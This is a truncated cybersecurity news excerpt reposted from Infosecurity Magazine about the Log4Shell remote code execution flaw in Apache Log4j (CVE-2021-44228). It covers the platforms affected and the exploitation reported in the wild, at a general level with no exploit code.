“Worst-Case Scenario” Log4j Exploit Travels the Globe

Dec 13, 2021 10:00 am Cyber Security 173

“Worst-Case Scenario” Log4j Exploit Travels the Globe

Security teams across the globe have been scrambling to address a dangerous new zero-day vulnerability in a popular Apache logging system currently being exploited in the wild.



Dubbed 'Log4Shell,' the bug is found in the Log4j Java-based logging product and can lead to relatively straightforward remote code execution which would allow attackers to deploy malware on a targeted server.



The exploit is dangerous for two reasons: Log4j is used by applications and platforms found all over the internet, including Minecraft, Apple iCloud, Tesla, Cloudflare and Elasticsearch. Second, it’s relatively easy to exploit, by forcing a vulnerable application to log a particular string of characters.



That could be done in a variety of ways as apps log many different types of events. According to one researcher, Minecraft servers were exploited simply by typing a short message into the chat box.



Sophos has posted a detailed write-up of the underlying improver input validation flaw: CVE-2021-44228.



The impact of this discovery could dominate the work of cybersecurity professionals over the coming weeks.



According to Sophos senior threat researcher, Sean Gallagher, Log4Shell has already been exploited to install coin miners, expose AWS keys, and install remote access tools including Cobalt Strike in victim environments.



“Log4Shell is a library that is used by many products. It can th ..

Support the originator by clicking the read the rest link below.

worst scenario log4j exploit travels globe
Read The Rest from the original source
infosecurity-magazine.com

Related News

Be in Touch

All Rights Reserved #1 Source for Cyber Security News, Reports and Threat Intelligence
Powered By The Internet!!!!